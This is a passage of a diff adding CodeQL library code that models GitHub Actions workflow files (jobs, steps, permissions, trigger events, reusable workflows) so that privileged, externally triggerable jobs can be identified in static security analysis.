this.getOn().getAnEvent() = result } + + /** Gets the strategy for this workflow. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } +} + +class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { + YamlValue workflow_call; + + ReusableWorkflowImpl() { + n.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override EventImpl getATriggerEvent() { + // The trigger event for a reusable workflow is the trigger event of the caller workflow + this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result + or + // or the trigger event of the workflow if it has any other than workflow_call + this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" + } + + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } + + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + InputsImpl getInputs() { result.getNode() = workflow_call.(YamlMapping).lookup("inputs") } + + InputImpl getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) + } + + InputImpl getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } + + ExternalJobImpl getACaller() { + exists(DataFlow::CallNode call | + call.getCalleeNode() = this and + result = call.getCfgNode().getAstNode() + ) + } + + string getResolvedPath() { + result = + ["", "./"] + + this.getLocation() + .getFile() + .getRelativePath() + .replaceAll(getRepoRoot(), "") + .replaceAll(".github/workflows/external/", "") + } +} + +class InputsImpl extends AstNodeImpl, TInputsNode { + YamlMapping n; + + InputsImpl() { this = TInputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + //override AstNodeImpl getAChildNode() { result = this.getAnInput() } + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + InputImpl getAnInput() { n.maps(result.getNode(), _) } + + InputImpl getInput(string name) { + n.maps(result.getNode(), _) and + result.getNode().(YamlString).getValue() = name + } +} + +class DefaultsImpl extends AstNodeImpl, TDefaultsNode { + YamlMapping n; + + DefaultsImpl() { this = TDefaultsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "DefaultsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + ScalarValueImpl getValue(string name, string prop) { + n.lookup(name).(YamlMapping).lookup(prop) = result.getNode() + } +} + +class InputImpl extends AstNodeImpl, TInputNode { + YamlValue n; + + InputImpl() { this = TInputNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override InputsImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "InputImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } +} + +class OutputsImpl extends AstNodeImpl, TOutputsNode { + YamlMapping n; + + OutputsImpl() { this = TOutputsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OutputsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputExpr(_) } + + /** Gets a specific output expression by name. */ + ExpressionImpl getOutputExpr(string name) { + exists(YamlScalar l | + l = result.getParentNode().getNode() and + ( + n.lookup(name).(YamlMapping).lookup("value") = l or + n.lookup(name) = l + ) + ) + } + + string getAnOutputName() { n.maps(any(YamlString s | s.getValue() = result), _) } +} + +class PermissionsImpl extends AstNodeImpl, TPermissionsNode { + YamlMappingLikeNode n; + + PermissionsImpl() { this = TPermissionsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "PermissionsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + string getAScope() { + result = + [ + "actions", "attestations", "checks", "contents", "deployments", "discussions", "id-token", + "issues", "packages", "pages", "pull-requests", "repository-projects", "security-events", + "statuses" + ] + } + + string getAPermission() { + exists(YamlMapping mapping, string scope | + mapping = n and + result = scope + ": " + mapping.lookup(scope).(YamlScalar).getValue() + ) + or + exists(YamlScalar scalar | + scalar = n and + ( + scalar.getValue() = "write-all" and + result = this.getAScope() + ":write" + or + scalar.getValue() = "read-all" and + result = this.getAScope() + ":read" + ) + ) + } + + bindingset[perm] + string getPermission(string perm) { + exists(string p | + p = this.getAPermission() and p.matches(perm + ":%") and result = p.splitAt(":", 1).trim() + ) + } +} + +class StrategyImpl extends AstNodeImpl, TStrategyNode { + YamlMapping n; + + StrategyImpl() { this = TStrategyNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "StrategyImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + YamlMapping getMatrix() { result = n.lookup("matrix") } + + /** Gets a specific matrix expression (YamlMapping) by name. */ + ExpressionImpl getMatrixVarExpr(string accessPath) { + exists(MatrixAccessPathImpl p, ScalarValueImpl v | + p.toString() = accessPath and + resolveMatrixAccessPath(n.lookup("matrix"), p).getNode(_) = v.getNode() and + result.getParentNode() = v + ) + } + + /** Gets a specific matric expression (YamlMapping) by name. */ + ExpressionImpl getAMatrixVarExpr() { + n.lookup("matrix").(YamlMapping).lookup(_) = result.getNode() + } +} + +class NeedsImpl extends AstNodeImpl, TNeedsNode { + YamlMappingLikeNode n; + + NeedsImpl() { this = TNeedsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override JobImpl getParentNode() { result.getNode().lookup("needs") = n } + + override string getAPrimaryQlClass() { result = "NeedsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets a job that needs to be run before the job defining these needs. */ + JobImpl getANeededJob() { + result.getId() = n.getNode(_).(YamlString).getValue() and + result.getLocation().getFile() = n.getLocation().getFile() + } +} + +class OnImpl extends AstNodeImpl, TOnNode { + YamlMappingLikeNode n; + + OnImpl() { this = TOnNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "OnImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMappingLikeNode getNode() { result = n } + + /** Gets an event that triggers the workflow. */ + EventImpl getAnEvent() { result.getParentNode() = this } +} + +class EventImpl extends AstNodeImpl, TEventNode { + YamlScalar e; + YamlMappingLikeNode n; + + EventImpl() { this = TEventNode(e, n) } + + override string toString() { result = e.getValue() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override OnImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EventImpl" } + + override Location getLocation() { result = e.getLocation() } + + override YamlScalar getNode() { result = e } + + /** Gets the name of the event that triggers the workflow. */ + string getName() { result = e.getValue() } + + /** Gets the Yaml Node associated with the event if any */ + YamlMappingLikeNode getValueNode() { result = n } + + /** Gets an activity type */ + string getAnActivityType() { + result = + n.(YamlMapping).lookup("types").(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Gets a string value for any property (eg: branches, branches-ignore, etc.) */ + string getAPropertyValue(string prop) { + result = n.(YamlMapping).lookup(prop).(YamlMappingLikeNode).getNode(_).(YamlScalar).getValue() + } + + /** Holds if the event has a property with the given name */ + predicate hasProperty(string prop) { exists(this.getAPropertyValue(prop)) } + + /** Holds if the event can be triggered by an external actor. */ + predicate isExternallyTriggerable() { + // the job is triggered by an event that can be triggered externally + // except for workflow_run which requires additional checks + externallyTriggerableEventsDataModel(this.getName()) and + not this.getName() = "workflow_run" + or + this.getName() = "workflow_run" and + // workflow_run cannot be externally triggered if the triggering workflow runs in the context of the default branch + // An attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // in that case, the triggering workflow will run in the context of the PR head branch + not exists(this.getAPropertyValue("branches")) + or + // the event is `workflow_call` and there is a caller workflow that can be triggered externally + this.getName() = "workflow_call" and + ( + // there are hints that this workflow is meant to be called by external triggers + exists(ExpressionImpl expr, string external_trigger | + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + expr.getExpression().matches("%github.event" + external_trigger + "%") and + externallyTriggerableEventsDataModel(external_trigger) + ) + or + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getATriggerEvent() + .isExternallyTriggerable() + ) + } + + predicate isPrivileged() { + // the Job is triggered by an event other than `pull_request`, or `workflow_call` + not this.getName() = "pull_request" and + not this.getName() = "workflow_call" + or + // Reusable Workflow with a privileged caller or we cant find a caller + this.getName() = "workflow_call" and + ( + this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().isPrivileged() or + not exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller()) + ) + } +} + +class JobImpl extends AstNodeImpl, TJobNode { + YamlMapping n; + string jobId; + WorkflowImpl workflow; + + JobImpl() { + this = TJobNode(n) and + workflow.getNode().lookup("jobs").(YamlMapping).lookup(jobId) = n + } + + override string toString() { result = "Job: " + jobId } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override WorkflowImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "JobImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the ID of this job, as a string. */ + string getId() { result = jobId } + + /** Gets the workflow this job belongs to. */ + WorkflowImpl getWorkflow() { result = workflow } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets a needed job. */ + JobImpl getANeededJob() { + exists(NeedsImpl needs | + needs.getParentNode() = this and + result = needs.getANeededJob() + ) + } + + /** Gets the declaration of the outputs for the job. */ + OutputsImpl getOutputs() { result.getNode() = n.lookup("outputs") } + + /** Gets a Job output expression. */ + ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + /** Gets a Job output expression given its name. */ + ExpressionImpl getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + /** Gets the condition that must be satisfied for this job to run. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the deployment environment to run the job on. */ + EnvironmentImpl getEnvironment() { result.getNode() = n.lookup("environment") } + + /** Gets the permissions for this job. */ + PermissionsImpl getPermissions() { result.getNode() = n.lookup("permissions") } + + /** Gets the strategy for this job. */ + StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } + + /** Gets the trigger event that starts this workflow. */ + override EventImpl getATriggerEvent() { + if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl + then + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + or + result = this.getEnclosingWorkflow().getATriggerEvent() and + not result.getName() = "workflow_call" + else result = this.getEnclosingWorkflow().getATriggerEvent() + } + + /** Gets the runs-on field of the job. */ + string getARunsOnLabel() { + exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | + runson = n.lookup("runs-on").(YamlMappingLikeNode) + | + ( + lbl.getNode() = runson.getNode(_) and + not lbl.getNode() = runson.getNode("group") + or + lbl.getNode() = runson.getNode("labels").(YamlMappingLikeNode).getNode(_) + ) and + ( + not exists(MatrixExpressionImpl e | e.getParentNode() = lbl) and + result = + lbl.getValue() + .trim() + .regexpReplaceAll("^('|\")", "") + .regexpReplaceAll("('|\")$", "") + .trim() + or + exists(MatrixExpressionImpl e | + e.getParentNode() = lbl and + result = e.getLiteralValues() + ) + ) + ) + } + + private predicate hasExplicitSecretAccess() { + // the job accesses a secret other than GITHUB_TOKEN + exists(SecretsExpressionImpl expr | + (expr.getEnclosingJob() = this or not exists(expr.getEnclosingJob())) and + expr.getEnclosingWorkflow() = this.getEnclosingWorkflow() and + not expr.getFieldName() = "GITHUB_TOKEN" + ) + } + + private predicate hasExplicitNonePermission() { + exists(this.getPermissions()) and not exists(this.getPermissions().getAPermission()) + } + + private predicate hasExplicitReadPermission() { + // the job has not an explicit write permission + exists(this.getPermissions().getAPermission()) and + not this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasExplicitWritePermission() { + // the job has an explicit write permission + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitNonePermission() { + not exists(this.getPermissions()) and + exists(this.getEnclosingWorkflow().getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions()) and + not exists( + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + ) + } + + private predicate hasImplicitReadPermission() { + // the job has not an explicit write permission + not exists(this.getPermissions()) and + exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and + not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%read") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + not exists(this.getPermissions()) and + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%write") + } + + private predicate hasRuntimeData() { + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") + ) + } + + private predicate hasRuntimeWritePermissions() { + // the effective runtime permissions have write access + exists(string path, string trigger, string name, string secrets_source, string perms | + workflowDataModel(path, trigger, name, secrets_source, perms, _) and + path.trim() = this.getLocation().getFile().getRelativePath() and + name.trim().matches(this.getId() + "%") and + // We cannot trust the permissions for pull_request events since they depend on the + // provenance of the head branch (local vs fork) + not trigger.trim() = "pull_request" and + perms.toLowerCase().matches("%write%") + ) + } + + /** Holds if the job is privileged. */ + predicate isPrivileged() { + // the job has privileged runtime permissions + this.hasRuntimeWritePermissions() + or + // the job has an explicit secret accesses + this.hasExplicitSecretAccess() + or + // the job has an explicit write permission + this.hasExplicitWritePermission() + or + // the job has no explicit permissions but the workflow has write permissions + not exists(this.getPermissions()) and + this.hasImplicitWritePermission() + } + + /** Holds if the action is privileged and externally triggerable. */ + predicate isPrivilegedExternallyTriggerable(EventImpl event) { + this.getATriggerEvent() = event and + // job is triggereable by an external user + event.isExternallyTriggerable() and + // no matter if `pull_request` is granted write permissions or access to secrets + // when the job is triggered by a `pull_request` event from a fork, they will get revoked + not event.getName() = "pull_request" and + ( + // job is privileged (write access or access to secrets) + this.isPrivileged() + or + // the trigger event is __normally__ privileged + event.isPrivileged() and + // and we have no runtime data to prove otherwise + not this.hasRuntimeData() and + // and the job is not explicitly non-privileged + not ( + ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or + this.hasExplicitReadPermission() or + this.hasImplicitReadPermission() + ) and + not this.hasExplicitSecretAccess() + ) + ) + } +} + +abstract class StepsContainerImpl extends AstNodeImpl { + /** Gets any steps that are defined within this job. */ + abstract StepImpl getAStep(); + + /** Gets the step at the given index within this job. */ + abstract StepImpl getStep(int i); +} + +class RunsImpl extends StepsContainerImpl, TRunsNode { + YamlMapping n; + + RunsImpl() { this = TRunsNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override CompositeActionImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "RunsImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets the action that this `runs` mapping is in. */ + CompositeActionImpl getAction() { result = this.getParentNode() } + + /** Gets any steps that are defined within this job. */ + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } + + /** Gets the step at the given index within this job. */ + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } +} + +class LocalJobImpl extends JobImpl, StepsContainerImpl { + LocalJobImpl() { n.maps(any(YamlString s | s.getValue() = "steps"), _) } + + /** Gets any steps that are defined within this job. */ + override StepImpl getAStep() { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(_) + } + + /** Gets the step at the given index within this job. */ + override StepImpl getStep(int i) { + result.getNode() = n.lookup("steps").(YamlSequence).getElementNode(i) + } +} + +class StepImpl extends AstNodeImpl, TStepNode { + YamlMapping n; + + StepImpl() { this = TStepNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { + result.getAChildNode() = this and + (result instanceof LocalJobImpl or result instanceof RunsImpl) + } + + override string getAPrimaryQlClass() { result = "StepImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + override JobImpl getEnclosingJob() { + // if a step is within a composite action, we should follow the caller job + result = this.getEnclosingCompositeAction().getACallerJob() or + result = super.getEnclosingJob() + } + + override EventImpl getATriggerEvent() { result = this.getEnclosingJob().getATriggerEvent() } + + EnvImpl getEnv() { result.getNode() = n.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = n.lookup("id").(YamlString).getValue() } + + /** Gets the value of the `if` field in this step, if any. */ + IfImpl getIf() { result.getNode() = n.lookup("if") } + + /** Gets the Runs or LocalJob that this step is in. */ + StepsContainerImpl getContainer() { + result = this.getParentNode().(RunsImpl) or + result = this.getParentNode().(LocalJobImpl) + } + + StepImpl getNextStep() { + // if step is a uses step calling a local composite action, we should follow the called step + this instanceof UsesStepImpl and + exists(CompositeActionImpl a | + a.getACallerStep() = this and + result = a.getRuns().getStep(0) + ) + or + // if step is the last step in a composite action, we should follow the next step in the caller + exists(RunsImpl runs, StepsContainerImpl caller_container, StepImpl caller, int i | + this.getContainer() = runs and + runs.getStep(count(StepImpl s | runs.getAStep() = s | s) - 1) = this and + runs.getEnclosingCompositeAction().getACallerStep() = caller and + caller.getContainer() = caller_container and + caller_container.getStep(i) = caller and + caller_container.getStep(i + 1) = result + ) + or + // next step in the same job/runs + exists(int i | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(i + 1) + ) + } + + /** Gets a step that follows this step. */ + StepImpl getAFollowingStep() { + ( + // next steps in the same job/runs + exists(int i, int j | + this.getContainer().getStep(i) = this and + result = this.getContainer().getStep(j) and + i < j + ) + or + // next steps of the caller (in a composite action step) + result = this.getEnclosingCompositeAction().getACallerStep().getAFollowingStep() + or + // if any of the next steps is a call to a local composite actions, we should follow it + exists(int i, int j, CompositeActionImpl a | + this.getContainer().getStep(i) = this and + this.getContainer().getStep(j) = a.getACallerStep() and + i < j and + result = a.getRuns().getAStep() + ) + ) + } +} + +class EnvironmentImpl extends AstNodeImpl, TEnvironmentNode { + YamlValue n; + + EnvironmentImpl() { this = TEnvironmentNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "EnvironmentImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the environment name. */ + string getName() { result = n.(YamlScalar).getValue() } + + /** Gets the environmen name. */ + ExpressionImpl getNameExpr() { result.getParentNode().getNode() = n } +} + +class IfImpl extends AstNodeImpl, TIfNode { + YamlValue n; + + IfImpl() { this = TIfNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { result.getAChildNode() = this } + + override string getAPrimaryQlClass() { result = "IfImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlScalar getNode() { result = n } + + /** Gets the condition that must be satisfied for this job to run. */ + string getCondition() { result = n.(YamlScalar).getValue() } + + /** Gets the condition that must be satisfied for this job to run. */ + ExpressionImpl getConditionExpr() { result.getParentNode().getNode() = n } + + /** Get condition scalar style. */ + string getConditionStyle() { result = n.(YamlScalar).getStyle() } +} + +class EnvImpl extends AstNodeImpl, TEnvNode { + YamlMapping n; + + EnvImpl() { this = TEnvNode(n) } + + override string toString() { result = n.toString() } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + override AstNodeImpl getParentNode() { + result.(JobImpl).getEnv() = this or + result.(StepImpl).getEnv() = this or + result.(WorkflowImpl).getEnv() = this + } + + override string getAPrimaryQlClass() { result = "EnvImpl" } + + override Location getLocation() { result = n.getLocation() } + + override YamlMapping getNode() { result = n } + + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { n.lookup(name) = result.getNode() } + + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { n.lookup(_) = result.getNode() } + + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { n.lookup(name) = result.getParentNode().getNode() } + + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { n.lookup(_) = result.getParentNode().getNode() } +} + +abstract class UsesImpl extends AstNodeImpl { + abstract string getCallee(); + + abstract ScalarValueImpl getCalleeNode(); + + abstract string getVersion(); + + int getMajorVersion() { + result = this.getVersion().regexpReplaceAll("^v", "").regexpReplaceAll("\\..*", "").toInt() + } + + /** Gets the argument expression for the given key. */ + string getArgument(string key) { + exists(ScalarValueImpl scalar | + scalar.getNode() = this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) and + result = scalar.getValue() + ) + } + + /** Gets the argument expression for the given key (if it exists). */ + ExpressionImpl getArgumentExpr(string key) { + result.getParentNode().getNode() = + this.getNode().(YamlMapping).lookup("with").(YamlMapping).lookup(key) + } +} + +/** A Uses step represents a call to an action that is defined in a GitHub repository. */ +class UsesStepImpl extends StepImpl, UsesImpl { + YamlScalar u; + + UsesStepImpl() { this.getNode().lookup("uses") = u } + + override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + override string getCallee() { + if u.getValue().indexOf("@") > 0 + then result = u.getValue().prefix(u.getValue().indexOf("@")) + else result = u.getValue() + } + + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { result = u.getValue().suffix(u.getValue().indexOf("@") + 1) } + + override string toString() { + if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" + } +} + +/** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 + * local repo: ./.github/workflows/workflow-2.yml + * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 + */ +private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } + +private string pathUsesParser() { result = "\\./(.+)" } + +class ExternalJobImpl extends JobImpl, UsesImpl { + YamlScalar u; + + ExternalJobImpl() { n.lookup("uses") = u } + + override string getCallee() { + if u.getValue().matches("./%") + then result = u.getValue().regexpCapture(pathUsesParser(), 1) + else + result = + u.getValue().regexpCapture(repoUsesParser(), 1) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 2) + "/" + + u.getValue().regexpCapture(repoUsesParser(), 3) + } + + override ScalarValueImpl getCalleeNode() { result.getNode() = u } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + override string getVersion() { + exists(YamlString name | + n.lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(repoUsesParser(), 4) + else none() + ) + } +} + +class RunImpl extends StepImpl { + YamlScalar script; + ScalarValueImpl scriptScalar; + + RunImpl() { + this.getNode().lookup("run") = script and + scriptScalar = TScalarValueNode(script) + } + + override string toString() { + if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" + } + + /** Gets the working directory for this `run` mapping. */ + string getWorkingDirectory() { + if exists(n.lookup("working-directory").(YamlString).getValue()) + then + result = + n.lookup("working-directory") + .(YamlString) + .getValue() + .regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/") + else result = "GITHUB_WORKSPACE/" + } + + /** Gets the shell for this `run` mapping. */ + string getShell() { + if exists(n.lookup("shell")) + then result = n.lookup("shell").(YamlString).getValue() + else + if exists(this.getInScopeDefaultValue("run", "shell")) + then result = this.getInScopeDefaultValue("run", "shell").getValue() + else + if this.getEnclosingJob().getARunsOnLabel().matches(["ubuntu%", "macos%"]) + then result = "bash" + else + if this.getEnclosingJob().getARunsOnLabel().matches("windows%") + then result = "pwsh" + else result = "bash" + } + + ShellScriptImpl getScript() { result = scriptScalar } + + ExpressionImpl getAnScriptExpr() { result.getParentNode().getNode() = script } +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +bindingset[s] +string getASimpleReferenceExpression(string s, int offset) { + // If the expression is ${{ inputs.foo == "foo" }} we should not consider it as a simple reference + // check that expression matches a simple reference or several simple references ORed with || + s.regexpMatch("([A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)(\\s*\\|\\|\\s*[A-Za-z0-9'\\\"_\\[\\]\\*\\(\\)\\.\\-]+)*") and + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("[A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+", _, offset) + .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", _) +} + +bindingset[s] +string getAFromJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAToJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)tojson\\(\\s*[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)tojson\\(\\s*([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 2) +} + +bindingset[s] +string getAJsonReferenceAccessPath(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*)", + 3) +} + +/** + * A ${{}} expression accessing a sigcle context variable such as steps, needs, jobs, env, inputs, or matrix. + * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability + */ +class SimpleReferenceExpressionImpl extends ExpressionImpl { + SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(this.getFullExpression(), _)) + or + 